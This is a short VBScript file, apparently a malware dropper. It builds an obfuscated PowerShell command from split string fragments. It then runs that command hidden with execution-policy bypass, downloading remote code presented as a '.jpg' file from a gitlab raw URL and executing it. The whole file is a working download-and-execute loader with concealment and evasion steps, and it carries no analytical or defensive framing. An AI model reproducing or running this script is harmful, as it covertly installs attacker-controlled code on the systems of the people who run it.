Dim iOKkE(64), rRXrC, i

' Define each part based on the provided order
iOKkE(0) = "[BY"
iOKkE(1) = "Te["
iOKkE(2) = "]];"
iOKkE(3) = "$A1"
iOKkE(4) = "23="
iOKkE(5) = "'Ie"
iOKkE(6) = "X(N"
iOKkE(7) = "eW-"
iOKkE(8) = "OBJ"
iOKkE(9) = "eCT"
iOKkE(10) = " Ne"
iOKkE(11) = "T.W"
iOKkE(12) = "';$"
iOKkE(13) = "B45"
iOKkE(14) = "6='"
iOKkE(15) = "eBC"
iOKkE(16) = "LIe"
iOKkE(17) = "NT)"
iOKkE(18) = ".DO"
iOKkE(19) = "WNL"
iOKkE(20) = "O';"
iOKkE(21) = "[BY"
iOKkE(22) = "Te["
iOKkE(23) = "]];"
iOKkE(24) = "$C7"
iOKkE(25) = "89="
iOKkE(26) = "'/-"
iOKkE(27) = "/--"
iOKkE(28) = "/-/"
iOKkE(29) = "(''"
iOKkE(30) = "htt"
iOKkE(31) = "p:/"
iOKkE(32) = "/gitlab"
iOKkE(33) = ".com"
iOKkE(34) = "/dark78"
iOKkE(35) = "83108/"
iOKkE(36) = "darksto"
iOKkE(37) = "rm/-/"
iOKkE(38) = "raw/"
iOKkE(39) = "main/"
iOKkE(40) = "BR.jp"
iOKkE(41) = "g''"
iOKkE(42) = ")'."
iOKkE(43) = "ReP"
iOKkE(44) = "LAC"
iOKkE(45) = "e('"
iOKkE(46) = "/-/"
iOKkE(47) = "--/"
iOKkE(48) = "-/'"
iOKkE(49) = ",'A"
iOKkE(50) = "DST"
iOKkE(51) = "RIN"
iOKkE(52) = "G')"
iOKkE(53) = ";[B"
iOKkE(54) = "YTe"
iOKkE(55) = "[]]"
iOKkE(56) = ";Ie"
iOKkE(57) = "X($"
iOKkE(58) = "A12"
iOKkE(59) = "3+$"
iOKkE(60) = "B45"
iOKkE(61) = "6+$"
iOKkE(62) = "C78"
iOKkE(63) = "9)"

' Combine the parts into one string
rRXrC = ""
For i = 0 To 64 - 1
    rRXrC = rRXrC & iOKkE(i)
Next

' Use the combinedParts in the shell execution
Set objShell = CreateObject("WScript.Shell")
objShell.Run "POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI " & rRXrC, 0, True
Set objShell = Nothing